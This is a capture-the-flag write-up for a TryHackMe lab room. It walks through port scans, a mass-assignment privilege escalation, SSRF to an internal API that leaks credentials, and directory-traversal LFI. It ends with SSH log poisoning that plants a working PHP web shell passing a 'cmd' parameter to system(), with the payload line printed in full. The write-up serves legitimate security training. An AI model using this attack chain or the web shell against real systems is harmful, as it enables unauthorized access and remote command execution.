📁Include

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

Machine version: includev1.33

Use your server exploitation skills to take control of a web app.

Created by tryhackme, 1337rce, and l000g1c

1 - Port Scans

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- include.thm             
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 07:10 EEST
Stats: 0:08:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 66.93% done; ETC: 07:22 (0:04:09 remaining)
Stats: 0:10:18 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 81.70% done; ETC: 07:22 (0:02:19 remaining)
Nmap scan report for include.thm (10.10.122.153)
Host is up (0.11s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
110/tcp   open  pop3
143/tcp   open  imap
993/tcp   open  imaps
995/tcp   open  pop3s
4000/tcp  open  remoteanything
50000/tcp open  ibm-db2

Nmap done: 1 IP address (1 host up) scanned in 764.84 seconds

1b - Versioning and OS fingerprinting

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,25,110,143,993,995,4000,50000 include.thm
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 07:32 EEST
Nmap scan report for include.thm (10.10.122.153)
Host is up (0.11s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 64:63:1d:47:82:6d:db:ce:89:f6:8c:b6:a8:90:87:1a (RSA)
|   256 80:f6:68:89:c8:fa:8b:0b:96:62:b7:e0:77:6e:88:9b (ECDSA)
|_  256 4d:25:d1:05:06:83:69:6b:07:00:fc:c6:a0:cc:0c:69 (ED25519)
25/tcp    open  smtp     Postfix smtpd
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_smtp-commands: mail.filepath.lab, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: CAPA SASL AUTH-RESP-CODE PIPELINING RESP-CODES STLS TOP UIDL
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_ssl-date: TLS randomness does not represent time
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_imap-capabilities: SASL-IR more have post-login listed LOGINDISABLEDA0001 capabilities OK STARTTLS ENABLE LOGIN-REFERRALS ID IDLE Pre-login IMAP4rev1 LITERAL+
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_imap-capabilities: SASL-IR more AUTH=LOGINA0001 have AUTH=PLAIN post-login capabilities OK IDLE ENABLE listed LOGIN-REFERRALS ID Pre-login IMAP4rev1 LITERAL+
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: CAPA SASL(PLAIN LOGIN) AUTH-RESP-CODE PIPELINING RESP-CODES USER TOP UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
4000/tcp  open  http     Node.js (Express middleware)
|_http-title: Sign In
50000/tcp open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: System Monitoring Portal
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host:  mail.filepath.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.16 seconds

1z - What we know so far

  • No easy wins (critical CVE exploits or other)

  • We have 2 HTTP servers, SSH enabled and multiple ports for email

2 - Review App

2a - Exploring

Landing page. We do as it is written and log in using guest / guest.
Dashboard after login
View Profile

2b - Mass assignment

Submitting test1 and test2 adds them directly to our profile properties.
Overwriting the isAdmin property with anything other than false exploits a mass assignment vulnerability: the server copies every submitted field onto our profile, including fields we should not control. We now have access to new admin-only sections of the website.
The API documentation shows a server bound to 127.0.0.1:5000, meaning it is not publicly exposed. We need a way to perform an SSRF and read back the results.

2c - SSRF

Settings page. It seems we can let the server make requests on our behalf.
After submitting http://127.0.0.1:5000/getAllAdmins101099991 as Banner Image URL, we get this output in base64
Decoding the output
┌──(kali㉿kali)-[~]
└─$ echo "eyJSZXZpZXdBcHBVc2VybmFtZSI6ImFkbWluIiwiUmV2a--SNIP--" | base64 -d
{"ReviewAppUsername":"REDACTED_BY_ME","ReviewAppPassword":"REDACTED_BY_ME","SysMonAppUsername":"REDACTED_BY_ME","SysMonAppPassword":"REDACTED_BY_ME"}

2z - What we know so far

We now have credentials for the ReviewApp (port 4000) and the SysMonApp (port 50000; the app name is visible by simply visiting port 50000).

3 - SysMonApp

3a - Exploring and first flag

Landing page of port 50000
Using the credentials retrieved from the private server on port 5000
First flag!

3b - LFI

Looking at the source code of the dashboard, the only interesting component is the profile picture's URL: http://include.thm:50000/profile.php?img=profile.png

It seems PHP is including the PNG file rather than serving it as a static image, which is why the rendering is terrible.

It looks like the web app is using the parameter img to access a specified file on the filesystem. Maybe it is vulnerable to a directory traversal.

To test this potential attack vector, we intercept a normal request to the profile picture using Burp:

Make sure you are logged in on port 50000 before intercepting the request; sending requests without the proper cookies will always redirect you to the login page.

For the payload, we will use the one built into Burp:

Voila! Sorting the results by length, we notice that one of the attempts successfully returned the /etc/hosts file. This is amazing!

Now that we have uncovered the proper way to exploit the directory traversal vulnerability, we need to find a way to access the mysterious flag file located in /var/www/html (as specified in the room on TryHackMe). If we knew the filename, it would probably be game over. But we don't, so we need to find a way to list the contents of /var/www/html.

3c - Looking for a log file to poison

This is the request that successfully returned the contents of /etc/hosts.
We will send requests to retrieve well-known log file locations on Debian/Ubuntu.
Surprisingly, there was no log file for Apache. Luckily, there is one for SSH! (shown above)

3d - Log Poisoning

3di - Testing that it works

┌──(kali㉿kali)-[~]
└─$ nc include.thm 22
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11
<?php echo phpinfo(); ?>
Invalid SSH identification string.

3dii - Sending the payload

The payload below was retrieved from https://revshells.com/

┌──(kali㉿kali)-[~]
└─$ nc include.thm 22
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
Invalid SSH identification string.
Executing ls in /var/www/html. We found the filename!
Final Flag 🎉
